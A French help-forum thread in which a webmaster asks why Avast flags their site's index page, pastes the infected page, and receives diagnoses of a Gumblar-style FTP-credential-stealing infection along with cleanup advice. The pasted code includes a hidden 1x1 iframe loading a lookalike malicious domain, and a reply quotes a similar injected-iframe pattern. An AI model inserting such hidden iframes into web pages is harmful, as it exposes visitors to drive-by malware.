Blocage par Avast : virus:iframe-inf [Résolu]

[jamy2009]

Bonjour;
y a il quleqlqu'un qui peut m'aider?
J'ai du mal a accéder à la page d'index de mon site(juste l'index) une fois que j'active l'antivirus(avast version 4.8) ce dernier bloque ma page index en lui considérant un logiciel malveillant .Avast m'indiquant les paramétrés suivantes:
nom du fichier:url du site
nom du logeciel malveillant:HTML:Iframe-inf
ype:Virus/Ver
version:25/02/2009

je sais pas si l'utilisation des iframe provoque des problèmes de sécurité ou que mon serveur contient vraiment un virus??
aider moi a comprendre ma source du problème svp!!

[Yakko]

As-tu regardé les Iframe de ton Index pour vérifier qu'elles sont bien légitimes?

[jamy2009]

Bonjour,
je te remercie tout d'abord pour ton intervention.
oui c'est correctement écris .
en fait je pense pas que c'est un problème de légitimité car c'est presque méme page index qui se répété pour les autres pages(méme design) c'est ce que me dérange surtout

[Yakko]

Je pose la question car j'ai déjà eu le même problème avec un ami Webmaster qui c'est retrouvé avec une page d'index contenant une Iframe malveillante...Google l'avait d'ailleurs bloqué.
Fais des tests, enlève tes Iframe et tente une connexion. On saura vite si cela viens de là ou pas.

[jamy2009]

Bonjour,
Oui j'ai lancer la même page avec le même code et ça marché.
ce qui veut dire que c'est pas le probe du balise iframe.c'est un virus.en effet quand je télécharge ma page index de serveur pour la modifier la trouve completement vide?? y'a que ce petit script

<p>
<object classid="clsid27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="644" height="335">
<param name="movie" value="ghg.swf">
<param name="quality" value="High">
<embed src="ghg.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="644" height="335"></object>
</p>
<iframe src="http://google-ana1yticz.com/?click=1FDD0B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

j'arrive pas à comprendre.Je vé chercher la dernière version d'avast pour scanner mon serveur et voir par la suite
et vous si vous avez des propositions a ma faire c'est avec plaisir.
merci

[jamy2009]

Bonjour,
Oui j'ai lancer la même page avec le même code et ça marché.
ce qui veut dire que c'est pas le probe du balise iframe.c'est un virus.en effet quand je télécharge ma page index de serveur pour la modifier la trouve completement vide?? y'a que ce petit script

<p>
<object classid="clsid27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="644" height="335">
<param name="movie" value="ghg.swf">
<param name="quality" value="High">
<embed src="ghg.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="644" height="335"></object>
</p>
<iframe src="http://google-ana1yticz.com/?click=1FDD0B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

j'arrive pas à comprendre.Je vé chercher la dernière version d'avast pour scanner mon serveur et voir par la suite
et vous si vous avez des propositions a ma faire c'est avec plaisir.
merci

[Yakko]

Ne cherche pas plus loin, je pense que le "http://google-ana1yticz.com/" t'as mis la puce à l'oreille. Donne nous ton rapport après le scan de ton serveur

[jamy2009]

oui je vois je suis victime de ce virus.
mon serveur est trop plein et trop lourd au méme temps .une fois je le scanerai ainsi que tout les pc relié a lui je ve vous envoyé le rapport.
merci

[vladock]

Utilise aussi le logiciel spybot pour ton scan.
ça pourrais t'aider

[johanvanhoye]

Il n'y a probablement pas de virus sur le serveur. Par contre il y a certainement une vulnérabilité dans un script qui a permis à une personne malintentionnée de modifier le fichier pour y ajouter l'iframe qui renvoie vers une page sur laquelle se trouve un virus.

Il faut régulièrement mettre à jour les scripts répendus car plus ils sont répendus, plus ils sont vulnérables. Les scripts de content management, blog,etc. ou les utilisateurs peuvent mettre du contenu sont particulièrement touchés par ce genre d'attaque.

[nathannever]

Désolé johanvanhoye, Mais je crois que dans ce cas précis, il s'agit d'un trojan placé sur le Poste local, il communique alors les logins FTP à (des robots j'imagine ?) qui ensuite se connecte sur le FTP et modifie certain de vos fichier, pas seulement les index, mais d'autre type de fichiers aléatoires....

Dans le meilleurs des cas, la modification n'ajoute que des iframes par ci par là, des logiciels gratuit comme notepad++ permettent de les chercher et remplacer la chaine de carctère <iframe src="site.cn/virus.php" style="visibility:hidden"></iframe> par rien (un vide). iframe.attack permet de cleaner toutes les iframes d'un coup, c'est plus rapide mais c'est pas gratuit (y a une démo sur leur site scarabox.com).

Si par contre, il s'agit d'injection de code javascript, la c'est beaucoup plus complexe, et le remplacement des fichiers s'impose.

NN

[Antoine_935]

Je suis du même avis que Nathannever.
Un virus circule depuis mai dernier, baptisé initialement Gumblar.
Il s'installerait via une faille d'Adobe Flash / Reader pour piquer tes mots de passe ftp et ainsi se propager via tes sites.

Quelques détails ici:
http://forum.ovh.com/showthread.php?t=49433